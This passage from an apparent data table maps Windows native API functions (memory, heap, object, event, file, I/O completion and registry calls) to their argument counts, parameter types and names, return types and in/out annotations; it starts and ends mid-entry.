"PIMAGE_NT_HEADERS", ["__IN"]), "RtlImageRvaToVa": (4, ["PIMAGE_NT_HEADERS", "PVOID", "ULONG", "PIMAGE_SECTION_HEADER"], ["NtHeaders", "ModuleBase", "Rva", "pLastSection"], "PVOID", ["__IN", "__IN", "__IN", "__IN_OUT_opt"]), "NtFlushWriteBuffer": (0, [], [], "NTSTATUS", []), "NTShutdownSystem": (1, ["SHUTDOWN_ACTION"], ["Action"], "NTSTATUS", ["__IN"]), "NtQueryDefaultLocale": (2, ["BOOLEAN", "PLCID"], ["UserProfile", "DefaultLocaleId"], "NTSTATUS", ["__IN", "__OUT"]), "NTSetDefaultLocale": (2, ["BOOLEAN", "LCID"], ["UserProfile", "DefaultLocaleId"], "NTSTATUS", ["__IN", "__IN"]), "RtlAllocateHeap": (3, ["PVOID", "ULONG", "ULONG"], ["HeapHandle", "Flags", "Size"], "PVOID", ["__IN", "__IN", "__IN"]), "RtlCompactHeap": (2, ["HANDLE", "ULONG"], ["HeapHandle", "Flags"], "ULONG", ["__IN", "__IN"]), "RtlCreateHeap": (6, ["ULONG", "PVOID", "ULONG", "ULONG", "BOOLEAN", "PRTL_HEAP_DEFINITION"], ["Flags", "Base", "Reserve", "Commit", "Lock", "RtlHeapParams"], "PVOID", ["__IN", "__IN_opt", "__IN_opt", "__IN", "__IN_opt", "__IN_opt"]), "RtlDestroyHeap": (1, ["PVOID"], ["HeapHandle"], "NTSTATUS", ["__IN"]), "RtlEnumProcessHeaps": (2, ["PHEAP_ENUMERATION_ROUTINE", "PVOID"], ["HeapEnumerationRoutine", "Param"], "NTSTATUS", ["__IN", "__IN_opt"]), "RtlFreeHeap": (3, ["PVOID", "ULONG", "PVOID"], ["HeapHandle", "Flags", "MemoryPointer"], "BOOLEAN", ["__IN", "__IN_opt", "__IN"]), "RtlGetProcessHeaps": (2, ["ULONG", "PVOID"], ["MaxNumberOfHeaps", "*HeapArray"], "ULONG", ["__IN", "__OUT"]), "RtlLockHeap": (1, ["PVOID"], ["HeapHandle"], "BOOLEAN", ["__IN"]), "RtlProtectHeap": (2, ["PVOID", "BOOLEAN"], ["HeapHandle", "Protect"], "PVOID", ["__IN", "__IN"]), "RtlReAllocateHeap": (4, ["PVOID", "ULONG", "PVOID", "ULONG"], ["HeapHandle", "Flags", "MemoryPointer", "Size"], "PVOID", ["__IN", "__IN", "__IN", "__IN"]), "RtlSizeHeap": (3, ["PVOID", "ULONG", "PVOID"], ["HeapHandle", "Flags", "MemoryPointer"], "ULONG", ["__IN", "__IN", "__IN"]), "RtlUnlockHeap": (1, ["PVOID"], ["HeapHandle"], "BOOLEAN", ["__IN"]), "RtlValidateHeap": (3, ["PVOID", "ULONG", "PVOID"], ["HeapHandle", "Flags", "AddressToValidate"], "BOOLEAN", ["__IN", "__IN", "__IN_opt"]), "RtlValidateProcessHeaps": (0, [], [], "BOOLEAN", []), "RtlWalkHeap": (2, ["PVOID", "LPPROCESS_HEAP_ENTRY"], ["HeapHandle", "ProcessHeapEntry"], "NTSTATUS", ["__IN", "__IN_OUT"]), "NtAllocateVirtualMemory": (6, ["HANDLE", "PVOID", "ULONG", "PULONG", "ULONG", "ULONG"], ["ProcessHandle", "*BaseAddress", "ZeroBits", "RegionSize", "AllocationType", "Protect"], "NTSTATUS", ["__IN", "__IN_OUT", "__IN", "__IN_OUT", "__IN", "__IN"]), "NtFlushVirtualMemory": (4, ["HANDLE", "PVOID", "PULONG", "PIO_STATUS_BLOCK"], ["ProcessHandle", "*BaseAddress", "NumberOfBytesToFlush", "IoStatusBlock"], "NTSTATUS", ["__IN", "__IN_OUT", "__IN_OUT", "__OUT"]), "NtFreeVirtualMemory": (4, ["HANDLE", "PVOID", "PULONG", "ULONG"], ["ProcessHandle", "*BaseAddress", "RegionSize", "FreeType"], "NTSTATUS", ["__IN", "__IN", "__IN_OUT", "__IN"]), "NtLockVirtualMemory": (4, ["HANDLE", "PVOID", "PULONG", "ULONG"], ["ProcessHandle", "*BaseAddress", "NumberOfBytesToLock", "LockOption"], "NTSTATUS", ["__IN", "__IN", "__IN_OUT", "__IN"]), "NtProtectVirtualMemory": (5, ["HANDLE", "PVOID", "PULONG", "ULONG", "PULONG"], ["ProcessHandle", "*BaseAddress", "NumberOfBytesToProtect", "NewAccessProtection", "OldAccessProtection"], "NTSTATUS", ["__IN", "__IN_OUT", "__IN_OUT", "__IN", "__OUT"]), "NtQueryVirtualMemory": (6, ["HANDLE", "PVOID", "MEMORY_INFORMATION_CLASS", "PVOID", "ULONG", "PULONG"], ["ProcessHandle", "BaseAddress", "MemoryInformationClass", "Buffer", "Length", "ResultLength"], "NTSTATUS", ["__IN", "__IN", "__IN", "__OUT", "__IN", "__OUT_opt"]), "NtReadVirtualMemory": (5, ["HANDLE", "PVOID", "PVOID", "ULONG", "PULONG"], ["ProcessHandle", "BaseAddress", "Buffer", "NumberOfBytesToRead", "NumberOfBytesReaded"], "NTSTATUS", ["__IN", "__IN", "__OUT", "__IN", "__OUT_opt"]), "NtUnlockVirtualMemory": (4, ["HANDLE", "PVOID", "PULONG", "ULONG"], ["ProcessHandle", "*BaseAddress", "NumberOfBytesToUnlock", "LockType"], "NTSTATUS", ["__IN", "__IN", "__IN_OUT", "__IN"]), "NtWriteVirtualMemory": (5, ["HANDLE", "PVOID", "PVOID", "ULONG", "PULONG"], ["ProcessHandle", "BaseAddress", "Buffer", "NumberOfBytesToWrite", "NumberOfBytesWritten"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN", "__OUT_opt"]), "NtQuerySecurityObject": (5, ["HANDLE", "SECURITY_INFORMATION", "PSECURITY_DESCRIPTOR", "ULONG", "PULONG"], ["ObjectHandle", "SecurityInformationClass", "DescriptorBuffer", "DescriptorBufferLength", "RequiredLength"], "NTSTATUS", ["__IN", "__IN", "__OUT", "__IN", "__OUT"]), "NTSetSecurityObject": (3, ["HANDLE", "SECURITY_INFORMATION", "PSECURITY_DESCRIPTOR"], ["ObjectHandle", "SecurityInformationClass", "DescriptorBuffer"], "NTSTATUS", ["__IN", "__IN", "__IN"]), "NtDuplicateObject": (7, ["HANDLE", "PHANDLE", "HANDLE", "PHANDLE", "ACCESS_MASK", "BOOLEAN", "ULONG"], ["SourceProcessHandle", "SourceHandle", "TargetProcessHandle", "TargetHandle", "DesiredAccess", "InheritHandle", "Options"], "NTSTATUS", ["__IN", "__IN", "__IN", "__OUT", "__IN_opt", "__IN", "__IN"]), "NtMakeTemporaryObject": (1, ["HANDLE"], ["ObjectHandle"], "NTSTATUS", ["__IN"]), "NtQueryObject": (5, ["HANDLE", "OBJECT_INFORMATION_CLASS", "PVOID", "ULONG", "PULONG"], ["ObjectHandle", "ObjectInformationClass", "ObjectInformation", "Length", "ResultLength"], "NTSTATUS", ["__IN", "__IN", "__OUT", "__IN", "__OUT"]), "NTSetInformationObject": (4, ["HANDLE", "OBJECT_INFORMATION_CLASS", "PVOID", "ULONG"], ["ObjectHandle", "ObjectInformationClass", "ObjectInformation", "Length"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN"]), "NTSignalAndWaitForSingleObject": (4, ["HANDLE", "HANDLE", "BOOLEAN", "PLARGE_INTEGER"], ["ObjectToSignal", "WaitableObject", "Alertable", "Time"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN_opt"]), "NtWaitForMultipleObjects": (5, ["ULONG", "PHANDLE", "OBJECT_WAIT_TYPE", "BOOLEAN", "PLARGE_INTEGER"], ["ObjectCount", "ObjectsArray", "WaitType", "Alertable", "TimeOut"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN", "__IN_opt"]), "NtWaitForSingleObject": (3, ["HANDLE", "BOOLEAN", "PLARGE_INTEGER"], ["ObjectHandle", "Alertable", "TimeOut"], "NTSTATUS", ["__IN", "__IN", "__IN_opt"]), "NtCreateDebugObject": (4, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "BOOLEAN"], ["DebugObjectHandle", "DesiredAccess", "ObjectAttributes", "KillProcessOnExit"], "NTSTATUS", ["__OUT", "__IN", "__IN_opt", "__IN"]), "NtDebugActiveProcess": (2, ["HANDLE", "HANDLE"], ["ProcessHandle", "DebugObjectHandle"], "NTSTATUS", ["__IN", "__IN"]), "NtRemoveProcessDebug": (2, ["HANDLE", "HANDLE"], ["ProcessHandle", "DebugObjectHandle"], "NTSTATUS", ["__IN", "__IN"]), "NtCreateDirectoryObject": (3, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES"], ["DirectoryHandle", "DesiredAccess", "ObjectAttributes"], "NTSTATUS", ["__OUT", "__IN", "__IN"]), "NtOpenDirectoryObject": (3, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES"], ["DirectoryObjectHandle", "DesiredAccess", "ObjectAttributes"], "NTSTATUS", ["__OUT", "__IN", "__IN"]), "NtQueryDirectoryObject": (7, ["HANDLE", "POBJDIR_INFORMATION", "ULONG", "BOOLEAN", "BOOLEAN", "PULONG", "PULONG"], ["DirectoryObjectHandle", "DirObjInformation", "BufferLength", "GetNextIndex", "IgnoreInputIndex", "ObjectIndex", "DataWritten"], "NTSTATUS", ["__IN", "__OUT", "__IN", "__IN", "__IN", "__IN_OUT", "__OUT_opt"]), "NtClearEvent": (1, ["HANDLE"], ["EventHandle"], "NTSTATUS", ["__IN"]), "NtCreateEvent": (5, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "EVENT_TYPE", "BOOLEAN"], ["EventHandle", "DesiredAccess", "ObjectAttributes", "EventType", "InitialState"], "NTSTATUS", ["__OUT", "__IN", "__IN_opt", "__IN", "__IN"]), "NtOpenEvent": (3, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES"], ["EventHandle", "DesiredAccess", "ObjectAttributes"], "NTSTATUS", ["__OUT", "__IN", "__IN"]), "NtPulseEvent": (2, ["HANDLE", "PLONG"], ["EventHandle", "PreviousState"], "NTSTATUS", ["__IN", "__OUT_opt"]), "NtQueryEvent": (5, ["HANDLE", "EVENT_INFORMATION_CLASS", "PVOID", "ULONG", "PULONG"], ["EventHandle", "EventInformationClass", "EventInformation", "EventInformationLength", "ReturnLength"], "NTSTATUS", ["__IN", "__IN", "__OUT", "__IN", "__OUT_opt"]), "NtResetEvent": (2, ["HANDLE", "PLONG"], ["EventHandle", "PreviousState"], "NTSTATUS", ["__IN", "__OUT_opt"]), "NTSetEvent": (2, ["HANDLE", "PLONG"], ["EventHandle", "PreviousState"], "NTSTATUS", ["__IN", "__OUT_opt"]), "NTSetEventBoostPriority": (1, ["HANDLE"], ["EventHandle"], "NTSTATUS", ["__IN"]), "NtCreateEventPair": (3, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES"], ["EventPairHandle", "DesiredAccess", "ObjectAttributes"], "NTSTATUS", ["__OUT", "__IN", "__IN_opt"]), "NtOpenEventPair": (3, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES"], ["EventPairHandle", "DesiredAccess", "ObjectAttributes"], "NTSTATUS", ["__OUT", "__IN", "__IN"]), "NTSetHighEventPair": (1, ["HANDLE"], ["EventPairHandle"], "NTSTATUS", ["__IN"]), "NTSetHighWaitLowEventPair": (1, ["HANDLE"], ["EventPairHandle"], "NTSTATUS", ["__IN"]), "NTSetHighWaitLowThread": (0, [], [], "NTSTATUS", []), "NTSetLowEventPair": (1, ["HANDLE"], ["EventPairHandle"], "NTSTATUS", ["__IN"]), "NTSetLowWaitHighEventPair": (1, ["HANDLE"], ["EventPairHandle"], "NTSTATUS", ["__IN"]), "NTSetLowWaitHighThread": (0, [], [], "NTSTATUS", []), "NtWaitHighEventPair": (1, ["HANDLE"], ["EventPairHandle"], "NTSTATUS", ["__IN"]), "NtWaitLowEventPair": (1, ["HANDLE"], ["EventPairHandle"], "NTSTATUS", ["__IN"]), "NtCancelIoFile": (2, ["HANDLE", "PIO_STATUS_BLOCK"], ["FileHandle", "IoStatusBlock"], "NTSTATUS", ["__IN", "__OUT"]), "NtCreateFile": (11, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "PIO_STATUS_BLOCK", "PLARGE_INTEGER", "ULONG", "ULONG", "ULONG", "ULONG", "PVOID", "ULONG"], ["FileHandle", "DesiredAccess", "ObjectAttributes", "IoStatusBlock", "AllocationSize", "FileAttributes", "ShareAccess", "CreateDisposition", "CreateOptions", "EaBuffer", "EaLength"], "NTSTATUS", ["__OUT", "__IN", "__IN", "__OUT", "__IN_opt", "__IN", "__IN", "__IN", "__IN", "__IN_opt", "__IN"]), "NtCreateMailslotFile": (8, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "PIO_STATUS_BLOCK", "ULONG", "ULONG", "ULONG", "PLARGE_INTEGER"], ["MailslotFileHandle", "DesiredAccess", "ObjectAttributes", "IoStatusBlock", "CreateOptions", "MailslotQuota", "MaxMessageSize", "ReadTimeOut"], "NTSTATUS", ["__OUT", "__IN", "__IN", "__OUT", "__IN", "__IN", "__IN", "__IN"]), "NtCreateNamedPipeFile": (14, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "PIO_STATUS_BLOCK", "ULONG", "ULONG", "ULONG", "BOOLEAN", "BOOLEAN", "BOOLEAN", "ULONG", "ULONG", "ULONG", "PLARGE_INTEGER"], ["NamedPipeFileHandle", "DesiredAccess", "ObjectAttributes", "IoStatusBlock", "ShareAccess", "CreateDisposition", "CreateOptions", "WriteModeMessage", "ReadModeMessage", "NonBlocking", "MaxInstances", "InBufferSize", "OutBufferSize", "DefaultTimeOut"], "NTSTATUS", ["__OUT", "__IN", "__IN", "__OUT", "__IN", "__IN", "__IN", "__IN", "__IN", "__IN", "__IN", "__IN", "__IN", "__IN"]), "NtCreatePagingFile": (4, ["PUNICODE_STRING", "PLARGE_INTEGER", "PLARGE_INTEGER", "PLARGE_INTEGER"], ["PageFileName", "MiniumSize", "MaxiumSize", "ActualSize"], "NTSTATUS", ["__IN", "__IN", "__IN", "__OUT_opt"]), "NtDeleteFile": (1, ["POBJECT_ATTRIBUTES"], ["ObjectAttributes"], "NTSTATUS", ["__IN"]), "NtDeviceIoControlFile": (10, ["HANDLE", "HANDLE", "PIO_APC_ROUTINE", "PVOID", "PIO_STATUS_BLOCK", "ULONG", "PVOID", "ULONG", "PVOID", "ULONG"], ["FileHandle", "Event", "ApcRoutine", "ApcContext", "IoStatusBlock", "IoControlCode", "InputBuffer", "InputBufferLength", "OutputBuffer", "OutputBufferLength"], "NTSTATUS", ["__IN", "__IN_opt", "__IN_opt", "__IN_opt", "__OUT", "__IN", "__IN_opt", "__IN", "__OUT_opt", "__IN"]), "NtFlushBuffersFile": (2, ["HANDLE", "PIO_STATUS_BLOCK"], ["FileHandle", "IoStatusBlock"], "NTSTATUS", ["__IN", "__OUT"]), "NtFsControlFile": (10, ["HANDLE", "HANDLE", "PIO_APC_ROUTINE", "PVOID", "PIO_STATUS_BLOCK", "ULONG", "PVOID", "ULONG", "PVOID", "ULONG"], ["FileHandle", "Event", "ApcRoutine", "ApcContext", "IoStatusBlock", "FsControlCode", "InputBuffer", "InputBufferLength", "OutputBuffer", "OutputBufferLength"], "NTSTATUS", ["__IN", "__IN_opt", "__IN_opt", "__IN_opt", "__OUT", "__IN", "__IN_opt", "__IN", "__OUT_opt", "__IN"]), "NtLockFile": (10, ["HANDLE", "HANDLE", "PIO_APC_ROUTINE", "PVOID", "PIO_STATUS_BLOCK", "PLARGE_INTEGER", "PLARGE_INTEGER", "PULONG", "BOOLEAN", "BOOLEAN"], ["FileHandle", "LockGrantedEvent", "ApcRoutine", "ApcContext", "IoStatusBlock", "ByteOffset", "Length", "Key", "ReturnImmediately", "ExclusiveLock"], "NTSTATUS", ["__IN", "__IN_opt", "__IN_opt", "__IN_opt", "__OUT", "__IN", "__IN", "__IN", "__IN", "__IN"]), "NtNotifyChangeDirectoryFile": (9, ["HANDLE", "HANDLE", "PIO_APC_ROUTINE", "PVOID", "PIO_STATUS_BLOCK", "PVOID", "ULONG", "ULONG", "BOOLEAN"], ["FileHandle", "Event", "ApcRoutine", "ApcContext", "IoStatusBlock", "Buffer", "BufferSize", "CompletionFilter", "WatchTree"], "NTSTATUS", ["__IN", "__IN_opt", "__IN_opt", "__IN_opt", "__OUT", "__OUT", "__IN", "__IN", "__IN"]), "NtOpenFile": (6, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "PIO_STATUS_BLOCK", "ULONG", "ULONG"], ["FileHandle", "DesiredAccess", "ObjectAttributes", "IoStatusBlock", "ShareAccess", "OpenOptions"], "NTSTATUS", ["__OUT", "__IN", "__IN", "__OUT", "__IN", "__IN"]), "NtQueryAttributesFile": (2, ["POBJECT_ATTRIBUTES", "PFILE_BASIC_INFORMATION"], ["ObjectAttributes", "FileAttributes"], "NTSTATUS", ["__IN", "__OUT"]), "NtQueryDirectoryFile": (11, ["HANDLE", "HANDLE", "PIO_APC_ROUTINE", "PVOID", "PIO_STATUS_BLOCK", "PVOID", "ULONG", "FILE_INFORMATION_CLASS", "BOOLEAN", "PUNICODE_STRING", "BOOLEAN"], ["FileHandle", "Event", "ApcRoutine", "ApcContext", "IoStatusBlock", "FileInformation", "Length", "FileInformationClass", "ReturnSingleEntry", "FileMask", "RestartScan"], "NTSTATUS", ["__IN", "__IN_opt", "__IN_opt", "__IN_opt", "__OUT", "__OUT", "__IN", "__IN", "__IN", "__IN_opt", "__IN"]), "NtQueryEaFile": (9, ["HANDLE", "PIO_STATUS_BLOCK", "PVOID", "ULONG", "BOOLEAN", "PVOID", "ULONG", "PULONG", "BOOLEAN"], ["FileHandle", "IoStatusBlock", "Buffer", "Length", "ReturnSingleEntry", "EaList", "EaListLength", "EaIndex", "RestartScan"], "NTSTATUS", ["__IN", "__OUT", "__OUT", "__IN", "__IN", "__IN_opt", "__IN", "__IN_opt", "__IN"]), "NtQueryFullAttributesFile": (2, ["POBJECT_ATTRIBUTES", "PVOID"], ["ObjectAttributes", "Attributes"], "NTSTATUS", ["__IN", "__OUT"]), "NtQueryInformationFile": (5, ["HANDLE", "PIO_STATUS_BLOCK", "PVOID", "ULONG", "FILE_INFORMATION_CLASS"], ["FileHandle", "IoStatusBlock", "FileInformation", "Length", "FileInformationClass"], "NTSTATUS", ["__IN", "__OUT", "__OUT", "__IN", "__IN"]), "NtQueryOleDirectoryFile": (11, ["HANDLE", "HANDLE", "PIO_APC_ROUTINE", "PVOID", "PIO_STATUS_BLOCK", "PVOID", "ULONG", "FILE_INFORMATION_CLASS", "BOOLEAN", "PUNICODE_STRING", "BOOLEAN"], ["FileHandle", "Event", "ApcRoutine", "ApcContext", "IoStatusBlock", "FileInformation", "Length", "FileInformationClass", "ReturnSingleEntry", "FileMask", "RestartScan"], "NTSTATUS", ["__IN", "__IN_opt", "__IN_opt", "__IN_opt", "__OUT", "__OUT", "__IN", "__IN", "__IN", "__IN_opt", "__IN"]), "NtQueryVolumeInformationFile": (5, ["HANDLE", "PIO_STATUS_BLOCK", "PVOID", "ULONG", "FS_INFORMATION_CLASS"], ["FileHandle", "IoStatusBlock", "FileSystemInformation", "Length", "FileSystemInformationClass"], "NTSTATUS", ["__IN", "__OUT", "__OUT", "__IN", "__IN"]), "NtReadFile": (9, ["HANDLE", "HANDLE", "PIO_APC_ROUTINE", "PVOID", "PIO_STATUS_BLOCK", "PVOID", "ULONG", "PLARGE_INTEGER", "PULONG"], ["FileHandle", "Event", "ApcRoutine", "ApcContext", "IoStatusBlock", "Buffer", "Length", "ByteOffset", "Key"], "NTSTATUS", ["__IN", "__IN_opt", "__IN_opt", "__IN_opt", "__OUT", "__OUT", "__IN", "__IN_opt", "__IN_opt"]), "NtReadFileScatter": (9, ["HANDLE", "HANDLE", "PIO_APC_ROUTINE", "PVOID", "PIO_STATUS_BLOCK", "FILE_SEGMENT_ELEMENT", "ULONG", "PLARGE_INTEGER", "PULONG"], ["FileHandle", "Event", "ApcRoutine", "ApcContext", "IoStatusBlock", "SegmentArray", "Length", "ByteOffset", "Key"], "NTSTATUS", ["__IN", "__IN_opt", "__IN_opt", "__IN_opt", "__OUT", "__IN", "__IN", "__IN", "__IN_opt"]), "NTSetEaFile": (4, ["HANDLE", "PIO_STATUS_BLOCK", "PVOID", "ULONG"], ["FileHandle", "IoStatusBlock", "EaBuffer", "EaBufferSize"], "NTSTATUS", ["__IN", "__OUT", "__IN", "__IN"]), "NTSetInformationFile": (5, ["HANDLE", "PIO_STATUS_BLOCK", "PVOID", "ULONG", "FILE_INFORMATION_CLASS"], ["FileHandle", "IoStatusBlock", "FileInformation", "Length", "FileInformationClass"], "NTSTATUS", ["__IN", "__OUT", "__IN", "__IN", "__IN"]), "NTSetVolumeInformationFile": (5, ["HANDLE", "PIO_STATUS_BLOCK", "PVOID", "ULONG", "FS_INFORMATION_CLASS"], ["FileHandle", "IoStatusBlock", "FileSystemInformation", "Length", "FileSystemInformationClass"], "NTSTATUS", ["__IN", "__OUT", "__IN", "__IN", "__IN"]), "NtUnlockFile": (5, ["HANDLE", "PIO_STATUS_BLOCK", "PLARGE_INTEGER", "PLARGE_INTEGER", "PULONG"], ["FileHandle", "IoStatusBlock", "ByteOffset", "Length", "Key"], "NTSTATUS", ["__IN", "__OUT", "__IN", "__IN", "__IN"]), "NtWriteFile": (9, ["HANDLE", "HANDLE", "PIO_APC_ROUTINE", "PVOID", "PIO_STATUS_BLOCK", "PVOID", "ULONG", "PLARGE_INTEGER", "PULONG"], ["FileHandle", "Event", "ApcRoutine", "ApcContext", "IoStatusBlock", "Buffer", "Length", "ByteOffset", "Key"], "NTSTATUS", ["__IN", "__IN_opt", "__IN_opt", "__IN_opt", "__OUT", "__IN", "__IN", "__IN_opt", "__IN_opt"]), "NtWriteFileGather": (9, ["HANDLE", "HANDLE", "PIO_APC_ROUTINE", "PVOID", "PIO_STATUS_BLOCK", "FILE_SEGMENT_ELEMENT", "ULONG", "PLARGE_INTEGER", "PULONG"], ["FileHandle", "Event", "ApcRoutine", "ApcContext", "IoStatusBlock", "SegmentArray", "Length", "ByteOffset", "Key"], "NTSTATUS", ["__IN", "__IN_opt", "__IN_opt", "__IN_opt", "__OUT", "__IN", "__IN", "__IN", "__IN_opt"]), "NtCreateIoCompletion": (4, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "ULONG"], ["IoCompletionHandle", "DesiredAccess", "ObjectAttributes", "NumberOfConcurrentThreads"], "NTSTATUS", ["__OUT", "__IN", "__IN_opt", "__IN"]), "NtOpenIoCompletion": (3, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES"], ["IoCompletionHandle", "DesiredAccess", "ObjectAttributes"], "NTSTATUS", ["__OUT", "__IN", "__IN"]), "NtQueryIoCompletion": (5, ["HANDLE", "IO_COMPLETION_INFORMATION_CLASS", "PVOID", "ULONG", "PULONG"], ["IoCompletionHandle", "InformationClass", "IoCompletionInformation", "InformationBufferLength", "RequiredLength"], "NTSTATUS", ["__IN", "__IN", "__OUT", "__IN", "__OUT_opt"]), "NtRemoveIoCompletion": (5, ["HANDLE", "PULONG", "PULONG", "PIO_STATUS_BLOCK", "PLARGE_INTEGER"], ["IoCompletionHandle", "CompletionKey", "CompletionValue", "IoStatusBlock", "Timeout"], "NTSTATUS", ["__IN", "__OUT", "__OUT", "__OUT", "__IN_opt"]), "NTSetIoCompletion": (5, ["HANDLE", "ULONG", "PIO_STATUS_BLOCK", "NTSTATUS", "ULONG"], ["IoCompletionHandle", "CompletionKey", "IoStatusBlock", "CompletionStatus", "NumberOfBytesTransfered"], "NTSTATUS", ["__IN", "__IN", "__OUT", "__IN", "__IN"]), "NtCompactKeys": (2, ["ULONG", "HANDLE"], ["NrOfKeys", "KeysArray[]"], "NTSTATUS", ["__IN", "__IN"]), "NtCompressKey": (1, ["HANDLE"], ["Key"], "NTSTATUS", ["__IN"]), "NtCreateKey": (7, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "ULONG", "PUNICODE_STRING", "ULONG", "PULONG"], ["pKeyHandle", "DesiredAccess", "ObjectAttributes", "TitleIndex", "Class", "CreateOptions", "Disposition"], "NTSTATUS", ["__OUT", "__IN", "__IN", "__IN", "__IN_opt", "__IN", "__OUT_opt"]), "NtDeleteKey": (1, ["HANDLE"], ["KeyHandle"], "NTSTATUS", ["__IN"]), "NtDeleteValueKey": (2, ["HANDLE", "PUNICODE_STRING"], ["KeyHandle", "ValueName"], "NTSTATUS", ["__IN", "__IN"]), "NtEnumerateKey": (6, ["HANDLE", "ULONG", "KEY_INFORMATION_CLASS", "PVOID", "ULONG", "PULONG"], ["KeyHandle", "Index", "KeyInformationClass", "KeyInformation", "Length", "ResultLength"], "NTSTATUS", ["__IN", "__IN", "__IN", "__OUT", "__IN", "__OUT"]), "NtEnumerateValueKey": (6, ["HANDLE", "ULONG", "KEY_VALUE_INFORMATION_CLASS", "PVOID", "ULONG", "PULONG"], ["KeyHandle", "Index", "KeyValueInformation", "KeyValueInformation", "Length", "ResultLength"], "NTSTATUS", ["__IN", "__IN", "__IN", "__OUT", "__IN", "__OUT"]), "NtFlushKey": (1, ["HANDLE"], ["KeyHandle"], "NTSTATUS", ["__IN"]), "NtLoadKey": (2, ["POBJECT_ATTRIBUTES", "POBJECT_ATTRIBUTES"], ["DestinationKeyName", "HiveFileName"], "NTSTATUS", ["__IN", "__IN"]), "NtLoadKey2": (3, ["POBJECT_ATTRIBUTES", "POBJECT_ATTRIBUTES", "ULONG"], ["DestinationKeyName", "HiveFileName", "Flags"], "NTSTATUS", ["__IN", "__IN", "__IN"]), "NtNotifyChangeKey": (10, ["HANDLE", "HANDLE", "PIO_APC_ROUTINE", "PVOID", "PIO_STATUS_BLOCK", "ULONG", "BOOLEAN", "PVOID", "ULONG", "BOOLEAN"], ["KeyHandle", "EventHandle", "ApcRoutine", "ApcRoutineContext", "IoStatusBlock", "NotifyFilter", "WatchSubtree", "RegChangesDataBuffer", "RegChangesDataBufferLength", "Asynchronous"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN", "__IN", "__IN", "__IN", "__OUT", "__IN", "__IN"]), "NtOpenKey": (3, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES"], ["pKeyHandle", "DesiredAccess", "ObjectAttributes"], "NTSTATUS", ["__OUT", "__IN", "__IN"]), "NtQueryKey": (5, ["HANDLE", "KEY_INFORMATION_CLASS", "PVOID", "ULONG", "PULONG"], ["KeyHandle", "KeyInformationClass", "KeyInformation", "Length", "ResultLength"], "NTSTATUS", ["__IN", "__IN", "__OUT", "__IN", "__OUT"]), "NtQueryMultipleValueKey": (6, ["HANDLE", "PKEY_MULTIPLE_VALUE_INFORMATION", "ULONG", "PVOID", "ULONG", "PULONG"], ["KeyHandle", "ValuesList", "NumberOfValues", "DataBuffer", "BufferLength", "RequiredLength"], "NTSTATUS", ["__IN", "__IN_OUT", "__IN", "__OUT", "__IN_OUT", "__OUT_opt"]), "NtQueryValueKey": (6, ["HANDLE", "PUNICODE_STRING", "KEY_VALUE_INFORMATION_CLASS", "PVOID", "ULONG", "PULONG"], ["KeyHandle", "ValueName", "KeyValueInformationClass", "KeyValueInformation", "Length", "ResultLength"], "NTSTATUS", ["__IN", "__IN", "__IN", "__OUT", "__IN", "__OUT"]), "NtReplaceKey": (3, ["POBJECT_ATTRIBUTES", "HANDLE", "POBJECT_ATTRIBUTES"], ["NewHiveFileName", "KeyHandle", "BackupHiveFileName"], "NTSTATUS", ["__IN", "__IN", "__IN"]), "NtRestoreKey": (3, ["HANDLE", "HANDLE", "ULONG"], ["KeyHandle", "FileHandle", "RestoreOption"], "NTSTATUS", ["__IN", "__IN", "__IN"]), "NTSaveKey": (2, ["HANDLE", "HANDLE"], ["KeyHandle", "FileHandle"], "NTSTATUS", ["__IN", "__IN"]), "NTSetInformationKey": (4, ["HANDLE", "KEY_SET_INFORMATION_CLASS", "PVOID", "ULONG"], ["KeyHandle", "InformationClass", "KeyInformationData", "DataLength"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN"]), "NTSetValueKey": (6, ["HANDLE", "PUNICODE_STRING", "ULONG", "ULONG", "PVOID", "ULONG"], ["KeyHandle", "ValueName", "TitleIndex", "Type", "Data", "DataSize"], "NTSTATUS", ["__IN", "__IN", "__IN_opt", "__IN", "__IN", "__IN"]), "NtUnloadKey": (1, ["POBJECT_ATTRIBUTES"], ["DestinationKeyName"], "NTSTATUS", ["__IN"]), "RtlFormatCurrentUserKeyPath": (1, ["PUNICODE_STRING"], ["RegistryPath"], "NTSTATUS", ["__OUT"]), "NtCreateKeyedEvent": (4, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "ULONG"], ["KeyedEventHandle", "DesiredAccess", "ObjectAttributes", "Reserved"], "NTSTATUS", ["__OUT", "__IN", "__IN_opt", "__IN"]), "NtReleaseKeyedEvent": (4, ["HANDLE", "PVOID", "BOOLEAN", "PLARGE_INTEGER"], ["KeyedEventHandle", "Key", "Alertable", "Timeout"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN_opt"]), "NtWaitForKeyedEvent": (4, ["HANDLE", "PVOID", "BOOLEAN", "PLARGE_INTEGER"], ["KeyedEventHandle", "Key", "Alertable", "Timeout"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN_opt"]), "NtCreateMutant": (4, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "BOOLEAN"], ["MutantHandle", "DesiredAccess", "ObjectAttributes", "InitialOwner"], "NTSTATUS", ["__OUT", "__IN", "__IN_opt", "__IN"]), "NtOpenMutant": (3, ["PHANDLE", "ACCESS_MASK", 